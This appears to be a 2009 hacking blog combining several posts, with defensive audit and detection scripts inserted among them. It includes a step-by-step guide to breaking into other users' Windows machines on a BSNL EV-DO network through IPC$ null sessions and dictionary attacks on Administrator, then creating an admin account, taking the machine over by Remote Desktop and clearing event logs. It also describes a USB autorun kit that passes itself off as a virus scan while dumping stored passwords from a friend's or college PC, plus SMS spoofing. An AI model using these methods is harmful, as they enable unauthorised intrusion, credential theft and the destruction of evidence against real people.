The content written is strictly for educational purposes and not for misuse. SMS forging is the trick by which you can steal the identity of the sender. The working of SMS is explained below. First, the sender sends the SMS via an SMS gateway. The identity of the sender is attached to the SCCP packet of the SMS. Once the SMS reaches the SMS gateway, it is routed to the destination gateway and then to the receiver's handset. There are many ways to send an SMS to the SMS gateway; one of them is to use the internet. The concept of SMS forging lies in changing the SCCP packet, which contains the sender information, prior to delivering it to the SMS gateway. The intruder can change the SCCP packet and send that packet to any receiver as a spoofed SMS. Some websites on the net also provide this facility. Providing such a service is not legal, and a user using it may face serious consequences with the law. So I request you not to use this kind of trick to spoof SMS; the above info was only for educational purposes.
Tuesday, September 15, 2009
Monday, September 14, 2009
Remove Hidden Shares from Win32 Boxes
NetBIOS opens a way in for many intruders if its port is open on a LAN. By default the port number for NetBIOS is 139, and if it is in an open state, attackers can take advantage of the default hidden shares present on a Windows box, specifically the IPC$ share (IPC - Inter Process Connect). The attacker can exploit this using just the 'net use' command that ships with Windows itself: they use 'net use' to establish a remote connection via IPC$, and once that is done they can remotely create a user account on the compromised box, establish a telnet connection and easily root the box.
Here is a countermeasure that can be taken to avoid this sort of attack. By default Windows 2000, Windows XP and WinNT automatically enable the hidden shares (admin$, c$, d$ and IPC$ - Inter Process Connect). The following registry key will help you in disabling the hidden shares.
System Key: [HKEY_LOCAL_MACHINE > System > CurrentControlSet > Services > LanmanServer > Parameters]
Value Name: AutoShareWks
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable shares, 1 = enable)
Go to Run and type compmgmt.msc; this will take you to Computer Management. Click on 'Shared Folders' and then 'Shares', then delete the shares that you want to remove.
Note: To remove the admin share for only the current session, use the second method (Computer Management console); if you want a permanent removal, add the AutoShareWks value in the registry.
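To check that the AutoShareWks setting described above is actually in place, the following added example (not code from the original post) reads the text of a `reg export` of the LanmanServer\Parameters key and reports the state of the value. The sample exports and the function names are constructed for illustration; a real export is a UTF-16 file and has to be decoded before it is passed in.

```python
import re

# Key named in the post; registry key and value names are case-insensitive.
PARAMS_KEY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
              r"\Services\LanmanServer\Parameters")

# "name"=data  or  @=data  (the default value of a key)
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg(text):
    """Parse .reg export text into {key_lower: {value_name_lower: data}}.

    dword data becomes an int, quoted strings are unescaped, anything else
    (hex blobs and so on) is kept as raw text.
    """
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):            # hex data continues on the next line
            pending = line[:-1]
            continue
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1]
            # "[-KEY]" in a .reg file deletes the key, so it holds no values
            current = None if name.startswith("-") else keys.setdefault(name.lower(), {})
            continue
        m = _VALUE_RE.match(line)
        if m is None or current is None:
            continue
        name = re.sub(r"\\(.)", r"\1", m.group(1) or "").lower()
        data = m.group(2).strip()
        if data.lower().startswith("dword:"):
            current[name] = int(data[6:], 16)
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            current[name] = re.sub(r"\\(.)", r"\1", data[1:-1])
        else:
            current[name] = data
    return keys


def audit_autoshare(reg_text, value_name="AutoShareWks"):
    """Classify the hidden-share setting found in an export of PARAMS_KEY."""
    values = parse_reg(reg_text).get(PARAMS_KEY.lower())
    if values is None:
        return "key-not-in-export"
    data = values.get(value_name.lower())
    if data is None:
        return "enabled-by-default"        # value absent: the default applies
    if not isinstance(data, int):
        return "wrong-type"                # the post specifies REG_DWORD
    return "disabled" if data == 0 else "enabled"


# Constructed sample exports (not taken from a real machine).
HARDENED = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"ConstructedBlob"=hex:01,02,\
  03,04
"AutoShareWks"=dword:00000000
'''

DEFAULT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"ConstructedBlob"=hex:01,02
'''

WRONG_TYPE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareWks"="0"
'''

if __name__ == "__main__":
    for label, sample in (("hardened", HARDENED), ("default", DEFAULT),
                          ("wrong type", WRONG_TYPE)):
        print(f"{label:11s} -> {audit_autoshare(sample)}")
```

AutoShareWks governs the automatically created administrative shares (admin$ and the drive shares); IPC$ is not removed by it.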
Root the Machines that are using BSNL EV-DO
BSNL is a government body, now privatised, that offers telecommunication and broadband services in India. It also offers USB modems, both for rent and for purchase. This hack works on almost all the USB modems (ZTE EV-DO) provided by BSNL. EVDO is a technology, short for "Evolution - Data only", that uses 3G technology introduced by Qualcomm. Here I am going to share how to eavesdrop on the network of someone who is using BSNL EV-DO; using this trick you can take control of the box entirely.
This hack works only with Windows-based boxes.
Step 1:
Install the driver required for the BSNL ZTE EV-DO modem. As part of the installation it will prompt you to plug in the device; then change the default username and password, and connect to the internet.
Step 2:
While the modem is connected to the internet, open a command prompt and type the "Net View" command. It will display the names of all the machines connected to the same network that use a similar device (EV-DO). It blindly displays the hostnames that are part of that network, but it won't show whether the connected machines are alive or not. Here is the list of hostnames that was available when I was dealing with this; let it be a POC.
Step 3:
Now the major part is to find a host that is alive. This can be done both manually and with an automated batch program. Once you have a host that is alive, you can connect to its hidden IPC$ (Inter Process Connect) share by using the command below:
Net use \\IP-Address\IPC$ ""
In my case I used the following.....
So this will establish a NULL session with the target host that I have used. Now the target system and my computer are connected, and by using we have to move further...
Step 4:
Now, to check whether there is a connection between your computer and the target, just type the command below:
net use
This will reveal the current connections.....
Step 5:
On every Windows-based box there must be an Administrator account; few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using a dictionary attack or by launching a brute force attack against the target.
You can compromise the admin account by using a dictionary attack, and you can use the "LAN Remote user - Dictionary Attack". Check the syntax properly before starting.....
Step 6:
Once you have obtained the password of the administrator account, you can use the same net command to establish a connection with administrator rights....
Net use \\IP-Address\sharename "password" /user:administrator
Once you get the message "Command Completed Successfully", you are connected to the target machine with admin access.
Step 7:
Now go to Run and type "compmgmt.msc"; this will take you to Computer Management. Click on Action -> Connect to another computer.... and then type in the IP address or the hostname of the target machine.
Once you have access to the remote host, you can see Computer Management (Local) change to Computer Management (XXX.XXX.XXX.XXX) - Remote IP.
Step 8:
You can now create a new user account on the remote machine by expanding Local Users and Groups -> Users -> right click there, create a new user and assign admin rights.
Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote Desktop connection: go to Run, type MSTSC and hit Enter.
Step 10:
Type in the IP address of the remote host in the Remote Desktop Connection wizard and take over the computer.
Step 11:
To cover the traces, just clear all the logs in the Event Viewer on the target by using Computer Management itself; also make sure to delete the IPC$ connection logs by using the command
Net use \\IP-Address\IPC$ /delete
This is a high-potential security threat... because anyone can easily gain control over the computer across the network and can root them, make them zombies and later botnets, and so on.
Step 12:
To avoid being a victim of this kind of attack, you can read the article by clicking here.
Disclaimer :-
This is only meant for educational purposes. Neither the author nor the publisher takes any responsibility for any illegal activity.
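The steps above leave a recognisable sequence in the target's Security log: an anonymous network logon, a run of failed Administrator logons followed by a success, a new account added to Administrators, and a cleared log. The following added example (not from the original post) correlates that sequence for a defender; it assumes the Security event IDs used by Windows Vista and later (4624, 4625, 4720, 4732, 1102) and a simplified, constructed record layout rather than raw event XML.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

ADMIN_GROUP = "Administrators"


def correlate(events, fail_threshold=5, window=timedelta(minutes=30)):
    """Return [(time, rule, detail)] for the stages described in the post.

    Each event is a dict with "time", "id" and, depending on the id,
    "src", "user", "logon_type" and "group" (hypothetical normalised schema).
    """
    findings = []
    failures = defaultdict(deque)      # (src, user) -> times of failed logons
    created = {}                       # new account name -> creation time
    for ev in sorted(events, key=lambda e: e["time"]):
        t, eid = ev["time"], ev["id"]
        if eid == 4625:                                    # failed logon
            q = failures[(ev["src"], ev["user"].lower())]
            q.append(t)
            while q and t - q[0] > window:                 # drop stale failures
                q.popleft()
        elif eid == 4624 and ev["logon_type"] in (3, 10):  # network or RDP logon
            user = ev["user"].lower()
            if user == "anonymous logon":
                findings.append((t, "null-session", ev["src"]))
                continue
            recent = [f for f in failures.get((ev["src"], user), ())
                      if t - f <= window]
            if len(recent) >= fail_threshold:
                findings.append((t, "guessing-then-success",
                                 f"{ev['src']} -> {ev['user']} "
                                 f"after {len(recent)} failures"))
        elif eid == 4720:                                  # local account created
            created[ev["user"].lower()] = t
        elif eid == 4732 and ev["group"] == ADMIN_GROUP:   # added to local group
            born = created.get(ev["user"].lower())
            if born is not None and t - born <= window:
                findings.append((t, "new-local-admin", ev["user"]))
        elif eid == 1102:                                  # Security log cleared
            findings.append((t, "log-cleared", ev["user"]))
    return findings


# Constructed sample events; addresses come from the documentation range.
T0 = datetime(2009, 9, 14, 10, 0, 0)


def _ev(offset_s, eid, **fields):
    return {"time": T0 + timedelta(seconds=offset_s), "id": eid, **fields}


SAMPLE = (
    [_ev(-600, 4625, src="192.0.2.10", user="alice"),      # ordinary typo ...
     _ev(-590, 4624, src="192.0.2.10", user="alice", logon_type=3),
     _ev(5, 4624, src="192.0.2.44", user="ANONYMOUS LOGON", logon_type=3)]
    + [_ev(60 + i, 4625, src="192.0.2.44", user="Administrator")
       for i in range(7)]
    + [_ev(68, 4624, src="192.0.2.44", user="Administrator", logon_type=3),
       _ev(180, 4720, src="-", user="support1"),
       _ev(200, 4732, src="-", user="support1", group="Administrators"),
       _ev(300, 4624, src="192.0.2.44", user="support1", logon_type=10),
       _ev(540, 1102, src="-", user="Administrator")]
)

if __name__ == "__main__":
    for when, rule, detail in correlate(SAMPLE):
        print(when.time(), rule, detail)
```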
Saturday, September 12, 2009
Unlock Yahoo when Account is Blocked
This is a very easy but awesome trick. When you or someone else enters an incorrect login multiple times, Yahoo! locks the account for "security reasons" and you are unable to access your chat names. The cool thing is that these are a piece of cake to unlock. All you need is a list of Yahoo servers to log in with.
Every time you log in, you are using what's called a server to access Yahoo. You log in with a cookie, which is sort of like an information packet or ID proving that you are who you claim to be and that the account is yours. When people attempt to log your name in multiple times with a locking tool, all they are doing is logging in over and over with an incorrect password until your cookie expires, which means you will no longer be allowed to log in. So, when you find yourself locked, what you need to do is refresh your cookie. But how can you do that when the Yahoo server you were using has blocked you? Simple: find another server. Yahoo has servers all over the place. There are more than I'd care to count. I'll include a pretty decent sized list with this tutorial. All you have to do is paste one of these servers in your browser and log in on the page you see. Unless you have been locked on that server as well, you will receive a fresh cookie and will be able to log in to Messenger again.
Tons of people try to go through their email and log in there to unlock an account, but a smart locker will shut down your mail server first, then cut off your chat server. Most people don't know what to do if the email is blocked, so they give up trying. That's why I don't even bother with the email method. I simply pick another server, log in, and I'm good to go. There are so many servers out there that it is impossible to lock them all. Even if they could, the lock is only for about 12 hours, and then you're back in business.
Some Yahoo Servers :
http://cn.mail.yahoo.com/?id=77070 CHINA
http://edit.india.yahoo.com/config/mail?.intl=in INDIA
http://edit.europe.yahoo.com/config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/mail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/login USA
Yahoo Chat Logins :
http://hk.chat.yahoo.com/?myHome HK
http://tw.chat.yahoo.com/?myHome Taiwan
http://in.chat.yahoo.com/?myHome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?myHome Singapore
http://chinese.chat.yahoo.com/?myHome Chinese
http://cn.chat.yahoo.com/?myHome China
http://asia.chat.yahoo.com/?myHome Asia
http://au.chat.yahoo.com/?myHome Australia & NZ
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/chatbylycos.html France
http://de.docs.yahoo.com/chat/chatbylycos.html Germany
http://it.docs.yahoo.com/chat/chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat/chatbylycos.html UK & Ireland
http://ar.chat.yahoo.com/?myHome Argentina
http://br.chat.yahoo.com/?myHome Brazil
http://espanol.chat.yahoo.com/?myHome South America
http://mx.chat.yahoo.com/?myHome Mexico
http://ca.chat.yahoo.com/?myHome Canada
http://world.yahoo.com/ World of Yahoo
Cheers and keep learning..
Tuesday, September 1, 2009
Protech OS Installation
How to Install Protech OS ? [For Absolute Beginners]
I am writing this tutorial for people who are new to Linux distros and their installation. It assumes you already have Windows XP installed on your computer; this installation method is best suited to dual booting (both Windows and Linux). Screenshots are included for better clarity.
Partitioning
It would be great if you have the Hiren Boot Disk for partitioning and formatting a part of the disk (or all of it) to allot to the Protech installation. Boot the Hiren disk and resize or create the partition in which you would like to perform the installation. The format must be EXT2 or EXT3. I normally prefer Norton Partition Magic, which is available as the first option in the Hiren Boot Menu -> Partition Tools. Hiren actually consists of many useful disk, recovery and security related tools. Take a look at the sample screenshot below.
Once done with this step, you will see a GUI partition window where you can complete the partitioning job with the mouse, if the driver is available by default on the Hiren CD.
* Remember that you must define a partition space of at least 5GB for Protech.
Load the Protech CD
Reboot the computer after the partitioning and formatting are done. Now place the Protech OS CD into the CD drive and boot the computer using Protech. Follow the steps below to begin the installation process.
1. Select the Install or Upgrade option, available first in the Boot Menu screen.
2. If you would like to do a memory or CD/DVD error check, you may do so by selecting the 3rd and 4th options.
3. Wait till it loads into the desktop. As it boots as a Live OS by default, we must wait till the desktop loads successfully. Also remember Protech is based on Ubuntu. Hence it is possible to use the software repositories of Ubuntu as well as Debian by default.
4. Once loaded into the desktop, you can navigate the controls and options by simply right-clicking with the mouse.
5. The Application tab consists of Editors, Multimedia, Net, Programming and System Utilities.
6. Next comes the Security Tools option, which differentiates Protech OS from other security distributions. It contains well-recognized security software that one should play with.
7. You may change the default theme to your liking in the Fluxbox menu.
8. Let's move on to "HOME" to begin the installation process. In the new window you will see only one icon, named Install, when you are in the Live CD.
9. In the pop-up window you can select the default setups that need to be configured. This is similar to the Windows or Ubuntu installation steps.
10. It is very important that you select the partition space allotted previously using the Hiren Boot Disk.
11. Alright! Configure your root login and password, then the partition selection, and finally begin the installation process.
12. Once it has started you may need to wait 20 to 30 minutes (depending on the processor speed) for the compressed files to transfer from the CD to the hard drive.
13. Yummy! The installation is complete and it will prompt you to reboot (remove the CD from the CD/DVD drive).
14. It's all done now. You are ready to use Protech OS with its various security tools. It also works as a best desktop OS for me.
Add Your Name or Application to right click Of My Computer
How To Add Your Name or Application to right click Of My Computer
Play with your Windows XP with these registry hacks.
To write your name on the right-click menu, please follow these steps:
1. Copy and paste the following code into Notepad and then save it as "hack.reg"
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
2. Now edit it and type your name in
Eg:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="roney"
3. If you want to open an application when you click your name or the name of the application, then type the location of the application which you want to open in:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
For eg. C:\Program Files\Yahoo!\Messenger\messenger.exe (inside the .reg file each backslash in the path is written doubled: C:\\Program Files\\Yahoo!\\Messenger\\messenger.exe)
That's it. Finally save it and then run it.
------------------------------------------------------------
How To add Application Control Panel
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command]
@="rundll32.exe shell32.dll,Control_RunDLL"
How To add Application Add/Remove
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove\command]
@="control appwiz.cpl"
How To add Application Reboot/Restart
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"
How To add Application Shutdown
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Shutdown]\command]
@="shutdown -s -f -t 5"
Hope these old hacks will be useful for you. If you have some more registry hacks, share them here.
Saturday, August 29, 2009
Remove PDF files Restriction on Print,Copy,Paste etc..
Some PDF documents prevent the user from copying and pasting or printing their contents. This sometimes presents a problem, since the creator of the PDF file might have used a font that is not available on the system trying to read it. Ensode offers a free online utility that allows you to upload a PDF; once uploaded, a version of the PDF without printing or copying/pasting restrictions is displayed in a new browser window.
How to Remove Restrictions on Printing & Copying - Unlock the Pdf File
Method 1
To unlock a PDF file, enter its location in the "PDF file to unlock" field, either by typing it in the field or by clicking on the "browse" button and navigating to its location. See Screenshot Below
Method 2
The tricks given by us in our previous post for hacking password-protected PDFs, in Remove Restrictions from PDF Files
The unlocked version of the PDF will be displayed in a new browser window, opened in the default PDF application for your system (usually Adobe Acrobat Reader).
Thursday, August 27, 2009
Hack Passwords Using USB Drive
Today I will show you how to hack passwords using a USB pen drive. As we all know, Windows stores most of the passwords that are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP and FTP accounts, and auto-complete passwords of many browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pendrive you can create your own rootkit to hack passwords from your friend's/college computer. We need the following tools to create our rootkit.
MessenPass : Recovers the passwords of most popular instant messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView : Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassView : IE PassView is a small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 - v6.0.
Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more...
PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by the Mozilla Firefox web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to view the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step-by-step procedure to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables (.exe files) onto your USB pendrive, i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.
2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text into it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive as well.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps:
1. Insert the pendrive and the autorun window will pop up. (This is because we have created an autorun pendrive.)
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (this process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you'll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the computer.
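The drive described above is easy to recognise before it is ever plugged into a Windows host: an autorun.inf whose open= entry starts a script, an action= label dressed up as a security task, and a batch file that saves tool output with /stext. The following added example (not from the original post) checks a drive's files for those three traits; the function names and the sample drive contents are constructed for illustration, with the samples mirroring the text shown in the post.

```python
import os
import re

SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".wsf", ".ps1", ".scr", ".pif")
LURE_WORDS = re.compile(r"\b(scan|virus|antivirus|security|protect)\w*", re.I)
EXEC_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Return the [autorun] section as {key_lower: value}."""
    section, out = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            out[key.strip().lower()] = value.strip()
    return out


def _program(value):
    """First token of a command line, honouring a leading quoted path."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return value.split()[0] if value else ""


def scan_drive(files):
    """files: {relative_path: text}. Return a list of (path, finding)."""
    findings = []
    by_name = {p.lower().replace("/", "\\"): p for p in files}
    inf_path = by_name.get("autorun.inf")
    if inf_path is None:
        return findings
    entries = parse_autorun(files[inf_path])
    targets = []
    for key, value in entries.items():
        is_verb = key.startswith("shell\\") and key.endswith("\\command")
        if key in EXEC_KEYS or is_verb:
            program = _program(value)
            targets.append(program)
            if program.lower().endswith(SCRIPT_EXT):
                findings.append((inf_path, f"{key}= launches script {program}"))
    label = entries.get("action", "")
    if targets and LURE_WORDS.search(label):
        findings.append((inf_path,
                         f"action= label poses as a security task: {label!r}"))
    for program in targets:
        script = by_name.get(program.lower())
        if script and script.lower().endswith((".bat", ".cmd")):
            dumps = [l for l in files[script].splitlines()
                     if re.search(r"(?i)\.exe\b.*\s/stext\s", l + " ")]
            if dumps:
                findings.append((script,
                                 f"{len(dumps)} command(s) save tool output with /stext"))
    return findings


def snapshot(root):
    """Read autorun.inf and top-level .bat/.cmd files from a mounted drive."""
    files = {}
    for name in os.listdir(root):
        if name.lower() == "autorun.inf" or name.lower().endswith((".bat", ".cmd")):
            with open(os.path.join(root, name), errors="replace") as fh:
                files[name] = fh.read()
    return files


# Constructed samples (file contents mirror the text shown in the post).
SAMPLE_DRIVE = {
    "autorun.inf": "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n",
    "launch.bat": ("start mspass.exe /stext mspass.txt\n"
                   "start mailpv.exe /stext mailpv.txt\n"),
}
BENIGN_DRIVE = {"autorun.inf": "[autorun]\nicon=setup.ico\nlabel=Backup\n"}

if __name__ == "__main__":
    for path, finding in scan_drive(SAMPLE_DRIVE):
        print(f"{path}: {finding}")
```

On the hardening side, the NoDriveTypeAutoRun policy value (set to 0xFF) turns AutoRun off for all drive types; that setting is not mentioned in the original post.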
Coding errors that helped Hackers and Intruders
Some 25 software coding errors have helped cyber criminals gain access to sites and accounts, leading to nearly 1.5 million security breaches.
The SANS Institute in Maryland said that in 2008, just two of the errors led to more than 1.5 m web site security breaches. The organisations which helped make the list and published the document include the US National Security Agency, the Department of Homeland Security, Microsoft, and Symantec. "The top 25 list gives developers a minimum set of coding errors that must be eradicated before software is used by customers," the BBC quoted Chris Wysopal, chief technology officer with Veracode.
SANS director, Mason Brown said: "There appears to be broad agreement on the programming errors. Now it is time to fix them. We need to make sure every programmer knows how to write code that is free of the top 25 errors." While most of the earlier advice focused on vulnerabilities that could have originated from programming errors, the 25 list examines the actual programming errors themselves.
The 25 Most Dangerous Programming Errors are:
CWE-116: Improper Encoding or Escaping of Output
CWE-89: Failure to Preserve SQL Query Structure
CWE-20: Improper Input Validation
CWE-79: Failure to Preserve Web Page Structure
CWE-78: Failure to Preserve OS Command Structure
CWE-319: Cleartext Transmission of Sensitive Information
CWE-352: Cross-Site Request Forgery
CWE-362: Race Condition
CWE-209: Error Message Information Leak
CWE-119: Failure to Constrain Operations within the Bounds of a Memory Buffer
CWE-642: External Control of Critical State Data
CWE-73: External Control of File Name or Path
CWE-665: Improper Initialization
CWE-426: Untrusted Search Path
CWE-94: Failure to Control Generation of Code
CWE-494: Download of Code Without Integrity Check
CWE-404: Improper Resource Shutdown or Release
CWE-682: Incorrect Calculation
CWE-285: Improper Access Control
CWE-327: Use of a Broken or Risky Cryptographic Algorithm
CWE-259: Hard-Coded Password
CWE-732: Insecure Permission Assignment for Critical Resource
CWE-330: Use of Insufficiently Random Values
CWE-250: Execution with Unnecessary Privileges
CWE-602: Client-Side Enforcement of Server-Side Security
(ANI)
This list is produced by the National Security Agency (NSA) and 30 other organisations to put forward the flaws.
Friday, August 21, 2009
Learn how to hack Yahoo/MSN/AOL/Google
This is not actually hacking but recovering passwords. You can recover passwords of Yahoo, MSN, Hotmail, Live, Google, Gmail, AOL, AIM, ICQ and a lot more. Think a bit if your main motive is to get the password anyway.
Now there are a bit of requirements.
First, your victim must have used an IM (instant messenger) at least once with this ID. Say for Yahoo he must use Yahoo Messenger. Online versions don't count. So this means you cannot hack accounts of, say, Facebook or MySpace, which don't have their own IM.
Second, you must have access to his comp where he has used the IM.
Third, he must not have formatted his system recently, or he must have used the IM after the format.
These requirements are tough, I know. You will hit a jackpot if you are on a shared comp, as it's not frequently formatted and many use IM. You can even ask him to use the IM on your comp. Once you fulfill these, the job's almost done.
Now you can use this password recovery software to get hold of your victim's password. This software has a high success rate but not 100%. I am giving all trial download links. If you want the full version, visit your fav torrent or rapidshare or megaupload. They will not crack any passwords greater than 4 chars, which means you can't hack most accounts as they require at least 6 chars.
You will have to temporarily stop the antivirus, as your antivirus will detect it as spyware. But they are spyware free, 100% safe.
MessenPass 1.16
Instant Messengers Password Recovery Master
Advanced Instant Messengers Password Recovery 3.4
Please use them sensibly. Use this only to get lost passwords of your own account. If you hack someone's account I won't take responsibility.
Make your pc faster
1. First, run a scandisk or checkdisk. Let Windows fix any errors.
2. Run a disk cleanup utility...this will flush your temporary internet folder, trash can, temp system files, etc.
3. Delete any garbage files or data...if possible, run a Duplicate File Finder program.
4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash and excess files!)
5. Run a registry cleaner utility and delete or get rid of any orphaned entries in that registry.
6. Check your existing swap file for its size and location (*will explain location later in the post). If you have a lot of RAM (i.e. 1 gig and over) set this swap file to something small, like 250 MB. The reason is that this will force Windows to load more into memory, resulting in faster performance (note: some games and applications actually require a certain sized swap file, so check your applications' performance after making a size adjustment for any error messages).
7. Under XP, you can tell Windows to use Classic Style on your desktop - this will remove the neat single click and internet-style desktop, but for lower end systems this will improve performance in other areas, such as gaming and multi-tasking.
8. Run msconfig and, under Startup, keep only the programs that are essential to load in the tray icon (and hence stay resident in memory). Uncheck anything else non-essential, like an ATI or Nvidia control panel, Quicktime utility, Real Audio, etc.
9. Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc. drivers from the manufacturers. A lot of my friends had chipsets on their motherboard that had advanced disk management capabilities or AGP port settings but the drivers weren't loaded for them so they were never being used. A simple upgrade realized a noticeable difference. For instance, they didn't have the latest driver for their AGP port so it was set to 1x, instead of being used at 4x!
10. (OK, so this won't speed up your PC but it could save you a lot of time and trouble later on!) After making all these improvements, make a working backup! I use Ghost, but for XP users you can also use System Restore...
-FOR ADVANCED USERS-
1. Take a look under the hood (for IDE owners). How are your IDE devices configured? If you have more than 1 hard drive, put the master hard drive on the primary IDE channel and the secondary hard drive on the secondary IDE channel (most motherboards have two IDE channels).
2. Place all CDROM drives, DVD readers etc. on the secondary IDE channel (or SCSI bus, etc). This will reduce I/O contention with your master hard drive which should have your OS and apps installed...
3. Remember when I mentioned the location of the swap file? OK, if you have 2 hard drives and you have one on the primary IDE channel and the other on the secondary IDE channel, move the swap file to a partition ON THE SECOND hard drive (on the secondary IDE channel). This will greatly improve system performance as the PC can write to the swap file while loading and running OS and system commands without I/O contention on the primary IDE channel!
4. Take a look under the hood (for SCSI owners). What kind of SCSI do you have? If it's the newer Ultra 160/320 etc. cards then guess what? Any devices placed on the same bus will automatically default to the slowest drive on the chain... this means that if you have, say, an Ultra 160 SCSI card, and it has an Ultra 160 drive (capable of transferring 160 MB/sec) on the same chain as a SCSI CDROM drive (capable of only 40 MB/sec), then the whole bus slows down to the 40 MB/sec speed... use different chains for the slower devices and maximize those hard drives!
5. Run a utility like WCPUID and check the settings... is your CPU/front speed bus/AGP port running as fast as they should be? If not, check your drivers and BIOS configuration options. Also, are all of your chipset features enabled? If not, then enable them! (usually done in your BIOS!)
6. Dig in to the BIOS... check settings like boot order, for example... is it checking the floppy first? Change this! Select your order to reflect the hard drive first, then CD, then floppy for a noticeable boot time improvement. Also disable any non-used on-board peripherals... for instance, does your motherboard come with an on-board NIC card? Guess what, if you don't use that NIC card and it is enabled it will eat up valuable CPU cycles and can be detrimental to your system's performance. DISABLE THAT MUTHA! Also, see if you can play with memory timing and CPU clock frequencies (NOTE! This is for expert users only!) Set these timings to "Aggressive" and see what happens in your games and apps... Also, check to see what your video aperture is set to. If you have a video card with 128 megs of on-board memory, your aperture should be set to this amount too. Read the BIOS owner manual for further non-general performance tricks or improvements! Do you have the latest BIOS firmware version?
7. Under hardware properties, check to see that everything is working properly, and fix any hardware contention issues. You'll see the dreaded yellow exclamation point (!) beside any hardware component that is not working correctly.
